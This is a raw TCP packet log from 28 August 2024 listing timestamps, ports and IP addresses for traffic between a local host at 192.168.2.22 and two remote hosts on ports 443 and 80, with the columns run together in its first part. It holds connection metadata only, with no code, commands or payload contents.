                                                      Aug 28, 2024 06:56:43.669912100 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.669954062 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.670867920 CEST44349168207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:56:43.670893908 CEST44349168207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:56:43.670949936 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.670949936 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.670949936 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.670969009 CEST44349168207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:56:43.690709114 CEST44349168207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:56:43.690730095 CEST44349168207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:56:43.690799952 CEST44349168207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:56:43.690819025 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.690819025 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.690819025 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.690897942 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.694415092 CEST49168443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:56:43.838361979 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:43.843612909 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:43.843666077 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:43.843759060 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:43.848165989 CEST4916780192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:43.848828077 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322316885 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322334051 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322477102 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322490931 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322496891 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.322506905 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322515965 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322525978 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322532892 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.322536945 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322542906 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.322550058 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322560072 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.322566032 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.322691917 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.327753067 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.327788115 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.327796936 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.327825069 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.409917116 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409938097 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409948111 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409960032 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409965992 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409971952 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409976959 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.409996986 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.410100937 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.410938978 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.410952091 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.410963058 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.410979033 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.677983046 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.677990913 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.677995920 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678042889 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678168058 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678183079 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678191900 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678200960 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678210020 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678210974 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678222895 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678227901 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678232908 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678246975 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678250074 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678258896 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678268909 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678276062 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678280115 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678291082 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678294897 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678324938 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678405046 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678416014 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678426981 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678443909 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678478956 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678489923 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678498983 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678503990 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678510904 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678528070 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678554058 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678587914 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678653002 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678663015 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678673029 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678683996 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678687096 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678695917 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678708076 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678714037 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678735971 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678893089 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678904057 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678913116 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678922892 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678930044 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678934097 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678945065 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678951025 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678955078 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678970098 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.678972960 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678983927 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.678992987 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.679003954 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.679003954 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.679009914 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.679017067 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.679029942 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.679039001 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.679056883 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.679064035 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759587049 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759602070 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759618998 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759632111 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759641886 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759654045 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759665966 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759721994 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759722948 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759732008 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759782076 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759792089 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759802103 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759839058 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759849072 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759859085 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759871006 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759871006 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759871006 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759871006 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759884119 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759888887 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759921074 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759958029 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.759963036 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759973049 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.759984970 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760004044 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760055065 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760066986 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760077953 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760097980 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760138988 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760149956 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760157108 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760160923 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760174990 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760191917 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760220051 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760272980 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760303020 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760313988 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760324001 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760334015 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760344982 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760349035 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760392904 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760458946 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760468960 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760478973 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760493994 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760498047 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760507107 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760525942 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760567904 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760579109 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760588884 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760607004 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760651112 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760660887 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760670900 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760683060 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760688066 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760715961 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760864019 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760874987 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760885000 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760895967 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760902882 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760907888 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760917902 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760927916 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760929108 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760941982 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760945082 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760966063 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.760974884 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.760998964 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761035919 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761050940 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761060953 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761070967 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761109114 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761204958 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761215925 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761228085 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761238098 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761253119 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761262894 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761272907 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761285067 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761344910 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761356115 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761358023 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761429071 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761429071 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761435986 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761447906 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761457920 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761468887 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761480093 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761486053 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761497021 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761640072 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761655092 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761665106 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761676073 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761681080 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761687040 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761696100 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761698961 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761720896 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761809111 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761826992 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761836052 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761848927 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761859894 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761862993 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761872053 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761890888 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761928082 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.761960983 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.761971951 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762044907 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762096882 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762108088 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762116909 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762130022 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762135029 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762140989 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762151957 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762161970 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762168884 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762171984 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762183905 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762196064 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762202024 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762207031 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762223959 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762398005 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762408972 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762418985 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762428999 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762437105 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762439966 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762451887 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762454987 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762463093 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.762523890 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.762525082 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803026915 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803039074 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803049088 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803059101 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803070068 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803078890 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803090096 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803101063 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.803117037 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.803117037 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.803173065 CEST4916980192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:44.847193956 CEST8049169192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:44.847233057 CEST8049169192.3.193.155192.168.2.22
Aug 28, 2024 06:56:44.847249031 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847260952 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847271919 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847292900 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847354889 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847369909 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847381115 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847390890 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847402096 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847456932 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847469091 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847479105 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847490072 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847507000 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847507954 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847507954 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847507954 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847537041 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847573996 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847584963 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847595930 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847605944 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847616911 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847616911 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847629070 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847645998 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847662926 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847666025 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847682953 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847692966 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847702026 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847712994 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847718000 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847728014 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847784996 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847796917 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847835064 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847841978 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847851992 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847862005 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847872972 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847879887 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847883940 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847903967 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.847987890 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.847999096 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848007917 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848018885 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848026037 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848031044 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848042965 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848050117 CEST  49169  80  192.168.2.22  192.3.193.155
